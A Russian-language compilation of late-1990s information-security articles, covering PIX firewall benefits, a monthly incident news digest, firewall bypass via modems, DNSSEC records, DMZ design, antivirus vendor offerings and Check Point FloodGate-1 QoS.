Во-вторых, расширенные возможности по сбору статистики помогают понять и контролировать использование ресурсов. При помощи менеджера межсетевого экрана легко генерировать отчеты с описанием даты и времени соединения, полного времени соединения, статистики по пользователям (байты и пакеты), порты и другую важную информацию. Эти отчеты можно использовать в системе учета для различных подразделений.
В-третьих, сопровождение PIX достаточно дешево. Поскольку системы с proxy-серверами в основном базируются на UNIX платформах, компании должны содержать высокооплачиваемых специалистов. Кроме того, поскольку большинство предупреждений CERT (Computer Emergency Response Team ) имеют отношение к UNIX системам, компании должны затрачивать усилия для изучения этих предупреждений и инсталляции патчей. PIX базируется на небольшой, защищенной системе реального времени, не требующей серьезных ресурсов для сопровождения. Поскольку все программное обеспечение PIX загружается из FLASH памяти, не требуется жестких дисков, что обеспечивает более высокий срок службы и период времени между ошибками.
В-четвертых, межсетевые экраны PIX обеспечивают высокий уровень масштабируемости, поддерживая от 64 (минимум) до более чем 16000 одновременных соединений. Это позволяет защищать инвестиции пользователей, поскольку при росте компании можно заменить версию на более высокую.
В пятых, наличие сквозных proxy позволяет снизить затраты, время и деньги за счет использования базы данных сервера доступа компании, использующего TACACS+ или RADIUS.
Ноябрь
Юристы с нетерпением ждут
судебных дел по поводу проблем с датой в двухтысячном году, считая
это золотой жилой, классическими гражданскими делами для юридической
школы. Корреспондент телеконференции RISKS <>
добавил: "Возможно, руководители отделов информатизации станут
обращать больше внимания на проблему двухтысячного года, когда
юристы начнут возбуждать против них дела".
Семь человек признаны
Королевским судом Лондона виновными в криминальном заговоре с
целью обмана британских банков путем прослушивания коммуникационных
линий между банкоматами и банковскими компьютерами. Перехваченные
данные должны были использоваться для изготовления большого числа
фальшивых банковских карт. (Reuters, 4 ноября).
Канадской полиции удалось
раскрыть самую крупную в истории страны банду, занимавшуюся детской
порнографией. Все началось с ареста 22-летнего жителя далекого
городка на севере провинции Онтарио. Затем полиция совместно с
ФБР прошлась по связям молодого человека, арестовав 16 членов
Интернет-клуба "Orchid Club", проживавших в Соединенных
Штатах, Австралии и Финляндии. Правоохранительными органами было
конфисковано 20 тысяч компьютерных файлов, содержащих фотографии
и видеоклипы противозаконных сексуальных действий с вовлечением
детей или их изображений. (AP, 4 ноября).
Руководители телефонной
индустрии пожаловались, что растущее использование Интернет приводит
к превышению расчетных показателей загрузки голосовых линий, что
в свою очередь вызывает увеличение числа сбоев в работе телефонной
системы США. Местные телефонные станции все чаще не справляются
с вызовами (меньшее число звонков проходит с первой попытки),
ответом на все большее количество вызовов оказываются сигналы
"занято" или полная тишина. (Reuters, 4 ноября).
Расследование, проведенное
сотрудниками ФБР, закончилось предъявлением обвинений бывшему
служащему американской корпорации Standard Duplicating Machines.
Похоже, что после трехлетней работы в корпорации, завершившейся
в 1992 году, этот служащий использовал свои знания об отсутствии
защиты корпоративной системы голосовой почты. Он извлекал директивы
по продажам и другие ценные данные в интересах прямого конкурента
- корпорации Duplo U.S.A. Успеху проникновений способствовало
использование подразумеваемых "паролей" голосовых почтовых
ящиков. Эти пароли в соответствии с общепринятой практикой состояли
из добавочного номера и символа "#" в конце. Предполагаемому
промышленному шпиону, если он будет признан виновным, грозит до
пяти лет тюрьмы и штраф в размере до 250 тысяч долларов. (PR News,
5 ноября). В конце месяца преступник признал себя виновным в телефонном
мошенничестве.
В начале ноября криминальные
хакеры атаковали антивоенный сервер
и уничтожили сотни копий документов Министерства обороны США,
связанных с использованием химического и бактериологического оружия
во время войны в Персидском заливе. Поговаривали, что атаку финансировало
правительство. (Newsbytes, 5 ноября).
Компания Internet Security
Systems (ISS) объявила о выпуске первой известной коммерческой
системы мониторинга в реальном времени, способной справляться
с "SYN-наводнениями" и другими атаками против доступности.
(Эта информация не означает поддержку системы со стороны NCSA.)
(См. ).
Радио-телевизионная и
коммуникационная комиссия Канады (CRTC) по запросу телефонных
компаний наделила их правом запрещать продолжающуюся всю ночь
факсовую рассылку всякой ерунды. Запрет может действовать в пределах
Канады с 21:30 до 9:00 по рабочим дням и с 18:00 до 10:00 по выходным.
(Reuter, 7 ноября).
Отдел по информатике и
телекоммуникациям (CSTB) Национального исследовательского совета
США (NRC) объявил о выходе в свет окончательной версии труда по
криптографической политике "Роль криптографии в защите информационного
общества" (Cryptography's Role in Securing the Information
Society). Предварительный вариант работы был опубликован в мае.
(Более подробную информацию можно найти по адресу ).
Trevor Warwick <twarwick@madge.com>
сообщил об экспериментах с сотовыми телефонами. В его организации
обычно устойчиво работавшие серверы NetWare в течение трех дней
зависали несколько раз без всяких видимых причин. Наконец, обслуживающий
персонал обратил внимание, что каждый раз, когда сервер "умирал",
рядом находился специалист из компании AT&T (он налаживал
офисную АТС), разговаривавший по сотовому телефону. Эксперименты
подтвердили, что можно наверняка "завесить" сервер,
если использовать сотовый телефон на расстоянии порядка фута от
компьютера. Опыты на резервном сервере показали, что сотовый телефон
вызывает необратимое повреждение системного диска. Так что держите
сотовые телефоны подальше от своих компьютеров. ().
7-8 ноября дочерняя компания
AT&T - поставщик Интернет-услуг WorldNet - стала жертвой частичного
отключения электроэнергии, продолжавшегося 18 часов. Все это время
около 200 тысяч пользователей были лишены полного доступа к своим
системам электронной почты. (AP, 8 ноября).
Также 8 ноября Web-сервер
газеты "New York Times" был поражен "SYN-наводнением",
сделавшим один из самых популярных во "Всемирной паутине"
серверов недоступным. (См. .
На некоторых коммерческих
Web-серверах неправильно установленные программы SoftCart делали
возможным неавторизованный доступ к информации о кредитных картах
клиентов, после того как те совершали покупки у онлайновых торговцев.
("Wall Street Journal" в изложении Edupage; ).
Два года назад в Ливерморской
лаборатории наблюдался изрядный переполох (если не сказать паника).
В компьютерах Министерства энергетики было обнаружено 90 тысяч
изображений откровенно сексуального характера. Вероятно, прогресс
в области информационной безопасности, имевший место с тех пор,
так и не смог проникнуть за некоторые медные лбы. Физик-лазерщик
Kenneth Manes предоставил своему 16-летнему сыну суперпользовательский
доступ к правительственному компьютеру, использовавшемуся главным
образом для вычислений в интересах создания суперлазера, запланированного
как часть исследовательской программы Лаборатории в области ядерного
оружия. В каталогах суперпользователя также нашлось место для
90 откровенно сексуальных изображений, применявшихся для "бомбардировки"
компьютера в Швеции. Другой сын физика, 23 лет от роду, согласно
документам, представленным в муниципальный суд, обвинен в использовании
незаконно полученного пользовательского счета для торговли краденым
программным обеспечением. Сам Manes и еще один ученый обвиняются
в судебно наказуемых проступках.
Региональное управление
федеральных программ по охране окружающей среды (EPA), обслуживающее
атлантическое побережье США, 6 ноября было вынуждено выключить
свои компьютерные сети после того, как вирусная инфекция поразила
15% рабочих станций и серверов. (AP, 10 ноября).
Примерно в это же время
кто-то заполнил порнографией и насмешками официальный Web-сервер
встречи на высшем уровне глав 21 латиноамериканской страны. Сервер
был спешно выключен побагровевшими представителями властей. (Reuters,
11 ноября).
Американский фонд "Загадай
желание" помимо собственной воли стал наглядным примером
того, какой вред могут нанести недатированные, неподписанные,
недостоверные, но неубиенные письма, циркулирующие в Интернет.
Фонду пришлось организовать горячую линию и Web-страницу, моля
об окончании одного из многих вариантов современного городского
мифа. Герой этого мифа - Craig Shergold, мальчик, страдавший от
опухоли мозга. К счастью, операция по удалению опухоли прошла
успешно, и сейчас мальчик здоров. Тем не менее, в Интернет, среди
добрых, но наивных людей, каждый день продолжают циркулировать
тысячи писем. Эти люди думают, что бедный паренек все еще хочет,
чтобы ему присылали почтовые и визитные карточки. Однако, ни он,
ни почтовые служащие того района, где он живет, этого не желают.
Фонд приплел к этому делу какой-то глупец, захотевший всего лишь
приукрасить свой рассказ, и с тех пор "Загадай желание"
нежданно- негаданно стал получать тысячи кусочков бумаги для человека,
к которому он не имеет никакого отношения. Вывод: НЕ пересылайте
письма, пока не убедитесь в их достоверности. (Дополнительную
информацию можно получить по адресу
или по телефону (001) 800-215-1333, добавочный 184).
Все больше глупцов разносят
все больше страшных "вирусных" сказок. Одна из последних
вспышек глупости возникла на почве "вируса" "Deeyenda",
который вроде бы делает ужасные вещи по электронной почте. (Подробности
можно найти по адресу ).
Другие идиотские слухи относятся к "вирусу" "PENPAL
GREETINGS", делающему столь же ужасные (и столь же невозможные)
вещи. (; ).
Общая настоятельная рекомендация: не пересылайте "предупреждения"
о "вирусах", пока не попросите компетентного человека
проверить достоверность подобного предупреждения. ().
Чтобы нам не показалось
мало со страхом ожидаемых катастрофических крахов древних компьютерных
систем, все еще неспособных представить дату, большую, чем 31
декабря 1999 года, нас решили напугать реальными крахами, которые
могут случиться примерно в это же время. Оказывается, пик 11-летнего
цикла солнечных пятен приходится на 2000 год, о чем предупреждает
центр с длинным названием National Oceanic and Atmospheric Administration's
Space Environment Center. Некоторые из возможных последствий:
волны в линиях электропитания; сбои в работе спутниковой системы
глобального позиционирования; помехи в спутниковых системах сотовой
телефонной связи; повреждение компьютеров и других электронных
систем на спутниках; расширение земной атмосферы и вызванные этим
пертурбации орбит спутников и космического мусора; наведенные
токи в трубопроводах и других больших металлических объектах;
изменения магнитного поля Земли; интерференция с сигналами, управляющими
работой глубинных нефтяных буровых установок. Думаю, в самом конце
1999 года я изыму из банковской системы все свои деньги и постараюсь
перевести их в золото. (AP, 19 ноября; ).
Газета "USA Today"
сообщает об обзоре 236 крупных корпораций, подготовленном для
одного из комитетов Конгресса. Оказалось, что более половины крупных
американских корпораций стали жертвами компьютерных вторжений.
Около 58% компаний-респондентов заявили, что в прошлом году они
подвергались вторжениям. Почти 18% потеряли из-за этого более
миллиона долларов. Две трети жертв сообщили о потерях, превышающих
50 тысяч долларов. Согласно утверждениям респондентов, более 20%
вторжений представляли собой случаи промышленного шпионажа и вредительства
со стороны конкурентов. Респонденты дружно выразили озабоченность
отрицательным воздействием огласки компьютерных инцидентов на
доверие общественности к компаниям-жертвам. (AP, 21 ноября).
Служащий правительства
города Нью-Йорк использовал искажение данных, чтобы удалить налоговые
записи на общую сумму 13 миллионов долларов. Это крупнейшее однократное
налоговое мошенничество в истории Нью-Йорка. Представители полиции
дали понять, что по данному делу может быть арестовано более 200
человек. Виновным в мошенничестве и взяточничестве грозит до 10
лет тюрьмы. (22 ноября; ).
Peter Garnett и его жена
Linda, 54 и 52 лет, депонировали поддельный чек на сумму, эквивалентную
16.6 миллиона долларов, якобы выданный Британским центральным
банком. Одновременно они предъявили благотворительный чек на сумму
в 595 долларов. Похоже, криминальные наклонности не всегда подкрепляются
достаточным интеллектом. Дополнительной уликой, показывающей,
что дело тут не чисто, стал расточительный образ жизни парочки
без всякой видимой поддержки расходов на круизы, изысканные обеды
и Роллс-Ройсы. Глупцов приговорили к трем с половиной годам заключения
в британских тюрьмах. (AP, 22 ноября).
В последнюю неделю ноября
был ликвидирован WWW-сервер, сообщавший новости об оппозиции жесткой
линии президента Белоруссии. (AP, 26 ноября).
29 ноября американская
государственная железнодорожная компания Amtrak лишилась доступа
к своей национальной программной системе резервирования и продажи
билетов - как раз перед началом самого напряженного в году периода
путешествий. Как правило, у агентов не было твердых копий расписаний
и цен на билеты, что приводило к большим задержкам в обслуживании
клиентов. ().
Издающаяся на Шетландских
островах (Великобритания) газета "Shetland Times" обратилась
в суд, чтобы заставить конкурирующую электронную "газету"
"Shetland News" отказаться от практики помещать ссылки
на Web-страницы Times, оформленные в виде оригинальных заголовков
последней. (). (Комментарий автора. Этот случай напоминает
о прежних дебатах в Web, когда с сервера "Babes on the Web"
начали рассылать гипертекстовые ссылки на каждую персональную
Web-страницу, подготовленную женщиной. Некоторые женщины возражали,
что такое использование ссылок является неприличным. В связи с
"Шетландским делом" возникает два вопроса. Во-первых,
является ли заголовок объектом авторского права? Во-вторых, является
ли гипертекстовая ссылка потенциальным нарушением авторского права?
Если кто-то, разместивший информацию на Web-странице, сможет законодательно
запретить другим ссылаться на нее, последствия для Web будут весьма
серьезными.)
29 ноября обиженный компьютерный
специалист из агентства Reuters в Гонконге взорвал логические
бомбы в пяти инвестиционных банках - пользователях сервиса Reuters.
В результате сеть, поставляющая рыночную информацию, критически
важную для торговли, не работала 36 часов. Банки немедленно переключились
на альтернативные сервисы, так что бомбы не оказали заметного
влияния на их работу. А вот в Reuters пришли в полное замешательство.
().
30 ноября в Онтарио система
дебетовых карт крупного канадского банка (CIBC) отказала из-за
ошибки в новой версии программного обеспечения. Примерно половина
всех транзакций в восточной Канаде была приостановлена на несколько
часов. ().
Вышел 49-й номер журнала
"Phrack", содержащий коды "стирателя" и другие
средства использования брешей в защите. Склонная к проказам группа
телефонных хакеров "Phone Losers of America" организовала
штаб-квартиру для межрегиональной координации.
"Нормальные герои всегда идут в обход"
Фрагмент песни из детского фильма "Айболит-69" как нельзя лучше иллюстрирует следующую проблему, присущую межсетевым экранам. Зачем пытаться проникнуть к защищаемым ресурсам через защитные средства, когда можно попытаться обойти их? Это можно проиллюстрировать примером из смежной области. В среду, 21 февраля 1990 г. Мэри Пирхем, аналитик по бюджету одной американской компании, пришла на работу. Однако она не смогла пройти на свое рабочее место даже после набора четырехзначного кода и произнесения кодового слова в системе контроля доступа. Желая все-таки попасть на работу, Мэри обошла здание и открыла дверь черного хода при помощи пилки для ногтей и пластмассовой расчески. Новейшая защитная система, которую обошла Мэри Пирхем, рекламировалась как "безотказная и надежная" и стоила несколько десятков тысяч долларов. Аналогично и с межсетевыми экранами, только роль черного хода может выполнять модем. Знаете ли вы, сколько в вашей сети установлено модемов и для чего они используются? Не отвечайте сразу утвердительно, подумайте. При обследовании одной сети начальники отдела защиты информации и автоматизации рвали на себе рубаху, утверждая, что они знают все до единого модема, установленные в их сети. Запустив систему анализа защищенности Internet Scanner, мы действительно обнаружили указанные ими модемы, используемые для обновления баз данных бухгалтерской и юридической систем. Однако было обнаружено и два неизвестных модема. Один использовался сотрудником аналитического отдела с целью получения доступа к рабочим каталогам из дома. Второй модем использовался для доступа в Internet, в обход межсетевого экрана.
С возможностью обхода МСЭ связан и другой пример. Не всегда угрозы идут только с внешней стороны МСЭ, из сети Internet. Большое количество потерь связано как раз с инцидентами защиты со стороны внутренних пользователей (по статистике - до 80% инцидентов исходят изнутри). Необходимо уточнить, что межсетевой экран только просматривает трафик на границах между внутренней сетью и сетью Internet. Если трафик, использующий "бреши" в защите, никогда не проходит через межсетевой экран, то МСЭ и не находит никаких проблем. В 1985 году на одном из российских судостроительных заводов была разоблачена преступная группа из свыше 70 (!) человек, которая в течение 1981-1985 гг. путем введения в информационную систему расчета зарплаты фальшивых документов похитила более 200 тыс. рублей. Аналогичные случаи были зафиксированы на заводах г. Ленинграда и г. Горького. Ни один, даже самый эффективный межсетевой экран, не смог бы обнаружить такую деятельность.
НОВЫЕ ЗАПИСИ РЕСУРСОВ
Криптографические подписи DNSSEC применяются к данным по зоне, динамическим обновлениям и транзакциям DNS. Кроме того, они используются для подтверждения отсутствия данных DNS. DNSSEC предусматривает три новые записи ресурсов - KEY RR, SIG RR и NXT RR.
KEY RR содержит открытый ключ, принадлежащий имени домена, указанному в KEY RR. Это не сертификат открытого ключа. Механизм обеспечения возможностей поиска сертификатов открытых ключей предусматривается DNSSEC WG, но не для целей защиты данных DNS. Он предоставляется в качестве дополнительного бонуса, благодаря которому DNS может применяться для запроса сертификатов открытых ключей на все, что может быть представлено с помощью имени домена. Эту возможность обеспечивает CERT RR.
SIG RR содержит преимущественно криптографическую подпись, дату окончания срока годности подписи и определение данных DNS, к которым эта подпись относится. NXT RR позволяет проверить (за счет использования криптографии), что RR для данного имени DNS не существует. Таким образом, отсутствие данной RR может быть подтверждено доказательно.
Другим аспектом DNSSEC является подпись транзакции (Transaction Signature, TSIG). TSIG отличается от других подписей DNS тем, что она создается с использованием шифрования с секретными ключами. Мы рассмотрим TSIG позже.
Протокол DNSSEC как таковой не обеспечивает конфиденциальности данных или контроля доступа. Однако конкретные его реализации могут предусматривать те или иные механизмы обеспечения конфиденциальности и контроля доступа. Причина отсутствия такого стандартного механизма в DNS в том, что исходный протокол DNS предназначался для работы с общедоступными данными. Озабоченность утечкой информации относительно имен и местонахождения систем и возможность атак по типу "отказ в обслуживании" порождает спрос на механизмы обеспечения конфиденциальности и контроля доступа. Этот спрос отражается в реализациях DNS.
Например, реализация BIND предусматривает контроль доступа для предотвращения пересылки зоны не уполномоченным на то системам. Кроме того, она позволяет запретить серверам DNS отвечать на запросы определенных систем. Сегодня конфиденциальность частично обеспечивается за счет применения брандмауэров и так называемой расщепленной DNS для затруднения доступа из внешней сети к внутренней информации DNS.
Internet Software Consortium (ISG) - некоммерческая организация, занимающаяся реализацией базовых протоколов Internet в виде открытых кодов, - добавила два механизма защиты для наделения сервера DNS возможностями DNSSEC. Первый определяет аутентичность данных в системе на основании проверки факта их подписи администратором узла, от которого они якобы поступили.
Однако, как большинство подобных решений, этот метод просто смещает акценты в проблеме защиты, ставя вопрос: "Как мы можем знать, что данные были действительно подписаны тем, кем они должны были быть подписаны?" В случае шифрования с открытыми ключами подписи генерируются с помощью личного ключа и проверяются с помощью открытого ключа. DNSSEC использует для распространения открытых ключей узлов Internet саму DNS, т. е. необходимый для проверки ключ предоставляется с помощью того же самого совершенно незащищенного протокола, что и данные, которые вы пытаетесь проверить. Кажется, что мы попали в замкнутый круг, но это не так.
Один из способов проверить открытый ключ до использования его для проверки ответа - взглянуть на подпись самого открытого ключа. Родительский узел должен подписывать все свои открытые ключи, поэтому в нашем первом примере проверочный (открытый) ключ examiner.com должен был быть подписан администратором com. Однако, прежде чем проверять подпись com для examiner.com, нам необходимо знать открытый (проверочный) ключ для самого com, а он должен быть подписан родителем com (т. е. вышеупомянутым корнем DNS). Чтобы быть абсолютно уверенными в том, что открытые (проверочные) ключи корня действительно принадлежат ему, они должны находиться на вашем компьютере в файле, полученном защищенным образом (например, на CD-ROM) от надежного источника (например, от производителя компьютера). Так как корень является прародителем всех имен доменов, для всей DNS нужен только один открытый ключ.
Второй механизм защиты, который ввела ISC, проверяет факт поступления протокольного сообщения от заслуживающего доверия источника. Это не принципиальное, но чрезвычайно важное различие: вместо проверки аутентичности данных механизм защиты проверяет аутентичность отправителя данных.
Практически все данные DNS поступают из кэшей, а не напрямую от основных или вспомогательных серверов. Кэши являются серверами DNS, но они не отвечают за эти данные непосредственно, как основные или вспомогательные серверы, и могут даже не иметь каких-либо постоянных собственных данных - все, что знают, они узнают, когда какой-либо клиент задает им вопрос, и они вынуждены находить на него ответ. Один типичный трюк, применяемый хакерами, состоит в бомбардировке клиента ответами именно в те интервалы времени, когда клиент ожидает получения ответа от локального кэширующего сервера. Клиент не в состоянии отличить настоящий ответ от поддельного, поэтому он просто использует любой полученный.
Клиенту приходится доверять, во-первых, серверу, что он выполнил свою работу по проверке данных, и, во-вторых, ответу, что он действительно поступил от локального кэширующего сервера, а не от некой вторгшейся в диалог третьей стороны.
Новый инструмент для защиты от любопытных глаз.
Хотя поставщики аппаратного и программного обеспечения, а также официальные лица в правительстве принимают позы защитников личной информации, в которую постороннее вторжение недопустимо, имеются серьезные основания опасаться, что наши путешествия по Internet не останутся анонимными. Хакеры могут легко читать послания по электронной почте, а Web-серверы протоколируют все и вся, включая даже перечень просматриваемых Web-страниц.
Freedom позволяет создать пять псевдонимов (или "нимов"), чтобы анонимно посылать электронную почту и путешествовать по Internet
Новый 50-долларовый продукт под названием Freedom ("Свобода") выпущен для того, чтобы изменить подобное положение: он помогает анонимно странствовать по Internet и отправлять электронную почту, используя трудно поддающиеся отслеживанию псевдонимы. Как утверждает поставщик, программа не позволяет идентифицировать пользователей даже ее создателям из монреальской фирмы Zero-Knowledge Systems. В наших неформальных тестах программа Freedom выполнила многое из обещанного.
Нужно ли планировать демилитаризованную зону сети (DMZ)?
DMZ (De-Militarized Zone) - это специальная защищенная часть сети, подключенная непосредственно к устройству разграничения доступа. Обычно это сеть, связанная с дополнительным сетевым интерфейсом на компьютере, - шлюзе с запушенным на нем приложением безопасности. Использование такого решения обеспечивает прохождение любого трафика DMZ через устройство разграничения доступа и контроля, что позволяет реализовать необходимые методы защиты, направленные против атак взломщиков.
Без DMZ, располагая серверы публичного доступа в защищаемой сети, мы подвергаем всю сеть потенциальной опасности: взломщики могут воспользоваться особенностями программного обеспечения сервера, получить доступ к нему, а затем и ко всей сети.
Заметим, что доступ взломщика к ресурсам внутренней сети не будут детектироваться firewall, так как доступ осуществляется в пределах защищенной сети.
При расположении же серверов публичного доступа в DMZ такие случаи будут детектироваться и пресекаться потому, что доступ из DMZ во внутреннюю сеть контролируется firewall. Таким образом, такой подход позволяет создавать наиболее безопасные конфигурации.
© ООО , 1998
О решениях нашей компании
Компания "Информационные бизнес системы" (IBS, ) длительное время занимается вопросами создания и совершенствования корпоративных информационных систем, и в том числе - предлагает услуги по проектированию и внедрению систем корпоративной антивирусной защиты на базе следующих продуктов:
AVP ("Лаборатория Касперского"), который обеспечивает антивирусный контроль на платформах DOS, Windows 95/98/NT/2000, NetWare, Linux, FreeBSD, BSDi. Также поддерживаются Microsoft Exchange, Microsoft Office 2000, Checkpoint Firewall-1, почтовые сервисы UNIX - sendmail и qmail. Компания предоставляет возможность ежедневного обновления пакета через Internet.
Продукты Лаборатории Касперского являются хорошим решением для небольших офисов, а также компаний, широко использующих в своей работе продукты Linux и FreeBSD
McAfee Active Virus Defense охватывает все операционные системы и групповые приложения, используемые в современных корпоративных сетях: клиентские ОС Windows 3.x / 95 / 98 / ME / NT Workstation / 2000 Professional, OS/2, DOS, Macintosh; серверные ОС Windows NT Server, Windows 2000 Server / Advanced Server / Datacenter, Novell Netware, FreeBSD, Linux, HP-UX, AIX, SCO, Solaris; групповые приложения MS Exchange и Lotus Notes / Domino; интернет-шлюзы MS Proxy Server; ОС микрокомпьютеров (PDA) Windows CE, Palm OS, Pocket PC, EPOC (Psion).
Является хорошим решением на уровне почтовых шлюзов а также для платформы HP-UX. Целесообразно применять при количестве рабочих мест более 500.
Symantec Antivirus (Symantec Corp.) - набор антивирусных продуктов компании Symantec, предлагаемый корпоративным пользователям. Объединяет все антивирусные продукты Symantec - для серверов Windows NT и Novell, рабочих станций, коммуникационных пакетов Lortus Notes и MS Exchange, SMTP почтовых серверов и брандмауеров, а также включает управляющую консоль Symantec System Center.
Применение продуктов Symantec целесообразно при общем количестве рабочих мест не менее 100 и наличии хотя бы одного сервера Windows NT/2000/NetWare. Отличительными особенностями данного пакета являются:
Иерархическая модель управления Наличие механизма реакции на возникновение новых вирусов
Важнейшей особенностью решений ИБС является то, что компания предоставляет поддержку всего спектра поставляемого и уже имеющегося у Заказчика антивирусного программного обеспечения. В зависимости от потребностей заказчика может быть оказана:
Стандартная техническая поддержка (консультации по телефону, доступ к базе данных обновлений - все в рабочее время) Техническая поддержка Платинум (техническая поддержка в рабочие и выходные дни, помощь при восстановлении от вирусных атак, принудительная рассылка обновлений, доступ к базам данных производителей)
Об авторе:
Алексей Викторович Лукацкий, руководитель отдела Internet-решений, Научно-инженерное предприятие "Информзащита", Москва, (095) 289-8998,
15 Июля 1999 г.
Обеспечение высокой производительности средств защиты и поддержка QoS
Появление и широкое распространение новых высокоскоростных сетевых технологий, в том числе и технологий доступа к глобальным сетям и Internet (xDSL, кабельные модемы и т.п.), ставит перед средствами защиты новые задачи в области производительности. Разработанные первоначально для работы на одном канале доступа со скоростями в десятки, максимум сотни килобит, межсетевые экраны и VPN-устройства сегодня должны обрабатывать трафик в реальном времени на скоростях в десятки, а иногда и сотни мегабит.
Учитывая вычислительную сложность и специализированный характер многих операций, выполняемых средствами защиты, основным направлением повышения производительности этих средства является аппаратная реализация типовых функций, используемых при аутентификации и других VPN-операциях. Аппаратное устройство может быть выполнено как дополнение к стандартной компьютерной платформе, или же в виде автономного специализированно устройства, включающего компьютерную платформу и выполняющему все функции экрана или VPN-шлюза.
Производительность отдельного устройства всегда ограничена, поэтому весьма перспективным является поддержка средствами защиты такого классического способа повышения производительности как распараллеливание. Кластеры VPN-шлюзов или межсетевых экранов, синхронизирующие свою работу, могут понадобиться для обслуживания тысяч одновременных соединений, возникающих при современном ведении бизнеса через Internet.
Еще одной существенной тенденцией в области производительности, которую нужно учитывать при развитии систем безопасности, является быстрое развитие различных технологий поддержки качества обслуживания (QoS) для IP-сетей. Эти технологии распределяют доступную полосу пропускания между классами трафика и отдельными соединениями, обеспечивая тем самым определенное качество транспортного обслуживания, требуемое для многих современных приложений. Для успешной работы таких QoS-технологий как DiffServ, RSVP и MPLS, применяемых сегодня как в корпоративных сетях, так и в Internet (пока - только на магистралях отдельных провайдеров), нужна их сквозная поддержка всеми сетевыми устройствами, через которые проходит трафик соединений. Устройства защиты - межсетевые экраны и VPN-устройства - всегда располагаются в точках, через которые проходит внешний трафик, поэтому данные устройства должны поддерживать QoS-технологии, чтобы обеспечить качество обслуживания "из конца в конец".
Поддержка функций QoS в межсетевом экране или VPN-шлюзе важна и в том случае, когда остальные устройства сети и публичная сеть не поддерживают управление качеством обслуживания. Обеспечиваемое устройством защиты дифференцированное обслуживание разных классов трафика в канале связи с внешней сетью (который часто представляет собой узкое место) способно заметно улучшить работу наиболее ответственных приложений.
В том случае, когда VPN-шлюз не поддерживает QoS-протоколы, он должен быть расположен в сети так, чтобы не мешать работе других QoS-устройств, которым нужен доступ к данным заголовков IP-пакетов для классификации трафика..
Постоянно возрастающие требования приложений к производительности коммуникаций удовлетворяются в системах безопасности на основе продуктов CheckPoint следующими способами:
Высокой скоростью выполнения операций контроля доступа и VPN-защиты трафика. Эта скорость обеспечивается высокой эффективностью алгоритмов технологии Stateful Inspection, возможностью установки продуктов CheckPoint на высокопроизводительных, в том числе и мультипроцессорных, аппаратных платформах, а также применением в случае необходимости устройства VPN-1 Accelerator Card, которое устанавливается в любую стандартную платформу и аппаратно реализует наиболее сложные в вычислительном отношении операции VPN-функций. Возможнстью распределения функций безопасности между несколькими параллельно работающими средствами защиты сети. В сети можно установить несколько межсетевых экранов и шлюзов VPN, координирующих и синхронизирующих свою работу, так что обработка многочисленных сессий будет распределяться между ними. Возможна также организация пулов серверов контроля доступа по содержанию, повышая тем самым производительность таких трудоемких операций как сканирование файлов на присутствие вирусов, поиск определенных ключевых слов в тексте, защита от Java и ActiveX атак и т.п. Отдельный модуль ConnectControl, входящий в состав межсетевого экрана FireWall-1, позволяет также распределять нагрузку между пулом однотипных серверов (например, Web-серверов или FTP-серверов), что удобно при организации демилитаризованной зоны. Управлением распределением полосы пропускания с помощью отдельного продукта FloodGate-1, выпускаемого компанией CheckPoint.
Продукт FloodGate-1 тесно интегрирован с базовым средством защиты FireWall-1/VPN-1, но может работать и как самостоятельный продукт поддержки QoS. Основное назначение FloodGate-1 - распределение пропускной способности между трафиком различных приложений на границе корпоративной сети, а именно, в каналах, подключенных к интерфейсам межсетевого экрана/VPN-шлюза FireWall-1/VPN-1. Через эти интерфейсы проходит весь внешний трафик приложений защищенной сети предприятия, причем как критически важных, так и менее ответственных. Дифференцированное распределение пропускной способности в интерфейсах межссетевого экрана может существенно улучшить работу ответственных приложений, предоставив им необходимую полосу пропускания и защитив их от интенсивного, но гораздо менее важного трафика, например, трафика пользователей, просматривающих новости в Internet или загружающих из FTP-архива новую версию какой-либо утилиты.
Операционные системы, поверх которых работает FireWall-1/VPN-1 на стандартных платформах, пока не поддерживают функции QoS. Установка FloodGate-1 в узлах, выполняющих роль межсетевого экрана и VPN-шлюза, ликвидирует этот пробел и дополняет систему управления QoS сети, работающую на современных маршрутизаторах и коммутаторах, важным QoS-элементом.
FloodGate-1 управляет полосой пропускания на основе улучшенного алгоритма взвешенного справедливого обслуживания WFQ, часто применяемого в IP-маршрутизаторах и коммутаторах. Компания Check Point дополнила базовые механизмы WFQ собственными интеллектуальными алгоритмами, благодаря чему FloodGate-1 поддерживает практически неограниченное количество виртуальных очередей, гарантируя определенную долю пропускной способности как для агрегированных потоков (например, для потоков всего Web-трафика), так и для потоков отдельных соединений (например, отдельного соединения RealAudio). Для каждого типа потока кроме гарантированной доли от общей пропускной способности интерфейса можно задать также верхнюю и нижнюю границы пропускной способности. Это позволяет гибко учитывать потребности приложений и обеспечить привилегированное обслуживание ответственных приложений при соблюдении некоторого минимума для остальных приложений, соблюдаемого при всех обстоятельствах. Полоса пропускания распределяется динамически, быстро реагируя на изменения набора существующих потоков в соответствии с заданными првилами.
Классификации потоков выполняется с помощью технологии Statful Inspection, той же, что работает и в межсетевых экранах FireWall-1. Большой опыт компании CheckPoint в этой области позволил реализовать в продукте FloodGate-1 один из наиболее мощных в сетевой индустрии механизмов классификации трафика для целей управления QoS. Этот механизм позволяет учесть практически все ситуации, складывающиеся при работе корпоративной сети и сгруппировать трафик наиболее рациональным образом по приложениям и пользователям.
Эффективность использования полосы пропускания при использовании FloodGate-1 увеличивается за счет фирменного алгоритма RDED (Retransmission Detect Early Drop), который решает известную проблему уменьшения полезной пропускной способности TCP-соединений из-за многочисленных повторных передачах при перегрузках. Механизм RDED предотвращает передачу некскольких копий одного и того пакета, за счет чего полезная пропускная способность повышается до 95% от полной пропускной способности канала вместо традиционных 50%- 60%.
Система управления трафиком FloodGate-1 полностью интегрирована с продуктом FireWall-1/VPN-1 и повторяет его распределенную архитектуру. Правила управления трафиком задаются в том же стиле, что и правила контроля доступа и VPN-защиты и могут использовать общие объекты. Для задания правил управления трафиком используется графический редактор, который в случае использования на предпритии системы FireWall-1 представлен в виде отдельной закладки редактора CheckPoint Policy Editor. Правила управления трафиком хранятся централизовано в базе правил Management Server и распределяются по всем модуля FloodGate-1 предприятия.
Система FloofGate-1 позволяет администратору осуществлять мониторинг за распределением полосы пропускания между потоками пакетов в реальном масштабе времени. Это дает возможность оценить эффективность заданных администратором правил и перераспределить весовые коээфициенты и границы пропускной способности таким образом, чтобы они наилучшим образом отражали реальные потребности приложений и пользователей.
Интеграция FloodGate-1 с FireWall-1/VPN-1 гарантирует корректность совместной работы средств управления трафиком со средствами VPN-защиты.
Обманные системы
